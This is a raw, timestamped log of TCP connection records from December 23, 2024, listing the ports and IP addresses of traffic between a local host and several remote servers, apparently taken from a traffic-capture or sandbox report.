                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.669285059 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.669395924 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:16.711352110 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:17.211994886 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:17.212069988 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:17.212140083 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:17.212285042 CET49726443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:17.212304115 CET4434972620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.617223024 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.617275000 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.617495060 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.699140072 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.699158907 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.090341091 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.090430975 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.266571999 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.266597033 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.267003059 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.269881010 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.310283899 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.355329037 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.651879072 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.652015924 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.652111053 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.652949095 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.652985096 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.743957996 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.743982077 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744016886 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744054079 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744122028 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744137049 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744138002 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744137049 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744165897 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.744204044 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.775036097 CET49752443192.168.2.6149.154.167.99
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.775051117 CET44349752149.154.167.99192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.169684887 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.169751883 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.169843912 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.170218945 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.170236111 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.878297091 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.878463030 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.891117096 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.891156912 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.891647100 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:28.938958883 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.002404928 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.002480984 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.005608082 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.005657911 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.005678892 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.005940914 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.014395952 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.014442921 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.014739990 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.014833927 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.015389919 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.051342964 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.059333086 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.684087992 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.684348106 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.684425116 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.684576035 CET49757443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.684598923 CET4434975720.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.712052107 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.712115049 CET44349759188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:29.712132931 CET49759443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479768038 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479793072 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.479830027 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480241060 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480247974 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480628967 CET49790443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.480647087 CET44349790188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.482311964 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:41.482319117 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.071865082 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.071980953 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.072139025 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.074265957 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.074299097 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551556110 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551635981 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551645994 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.551711082 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.552598953 CET49793443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.552619934 CET44349793188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.756916046 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.756959915 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757021904 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757688999 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.757708073 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236084938 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236140013 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236319065 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236633062 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.236645937 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298207998 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298239946 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298316002 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298631907 CET49808443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.298656940 CET44349808172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394130945 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394171000 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394386053 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394695044 CET49809443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:43.394714117 CET44349809172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.306425095 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.306525946 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308191061 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308221102 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.308532000 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310364008 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310444117 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310451031 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.310587883 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.312932014 CET4970080192.168.2.6151.101.194.133
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.351375103 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.433633089 CET8049700151.101.194.133192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.433736086 CET4970080192.168.2.6151.101.194.133
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.458149910 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.459358931 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.459403992 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.461546898 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.461632013 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462693930 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462785959 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.462913990 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.507337093 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.510430098 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.510457039 CET44349805172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.562048912 CET49805443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.852550983 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.852669954 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856290102 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856489897 CET49798443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.856530905 CET4434979820.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926141977 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926466942 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.926498890 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.927555084 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.927620888 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928019047 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:44.928081989 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.180140972 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186742067 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186800003 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.186808109 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200165033 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200192928 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200222969 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200239897 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.200285912 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.212553978 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.225783110 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.225858927 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.225883007 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.235502958 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.235551119 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.235557079 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.235564947 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.235606909 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.246233940 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.256849051 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.256896973 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.256918907 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.266586065 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.266639948 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.266648054 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.275998116 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.276066065 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.276072979 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.285545111 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.285610914 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.285621881 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.295088053 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.295144081 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.295166969 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.306489944 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.306554079 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.306577921 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.314269066 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.314321041 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.314347982 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.322870970 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.322926044 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.322949886 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.331851959 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.331897974 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.331932068 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.331970930 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.332016945 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.340370893 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.342299938 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.342354059 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.342381001 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.350614071 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.350729942 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.350754023 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.358428955 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.358496904 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.358524084 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.367865086 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.367990017 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.368016958 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.372339964 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.372426033 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.372448921 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.378257036 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.378330946 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.378341913 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.384763956 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.384826899 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.384845018 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.390772104 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.390822887 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.390830040 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.395504951 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.395556927 CET49806443192.168.2.6172.217.21.36
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.395565033 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.400722027 CET44349806172.217.21.36192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:52.809696913 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:52.809704065 CET49841443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:52.809710026 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:52.809767962 CET49841443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:52.809778929 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:53.424736977 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:53.424766064 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:53.424833059 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:53.425018072 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:53.425041914 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.304373980 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.304461956 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.304497957 CET49841443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.304549932 CET49841443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.305368900 CET49841443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.305382967 CET44349841188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.428009033 CET49849443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.428066015 CET44349849188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.428150892 CET49849443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.428361893 CET49849443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.428376913 CET44349849188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.837310076 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.837399006 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.837874889 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.837882042 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.839616060 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.839622974 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.839704037 CET49847443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.839720964 CET44349847188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:54.839798927 CET49847443192.168.2.6188.245.216.205
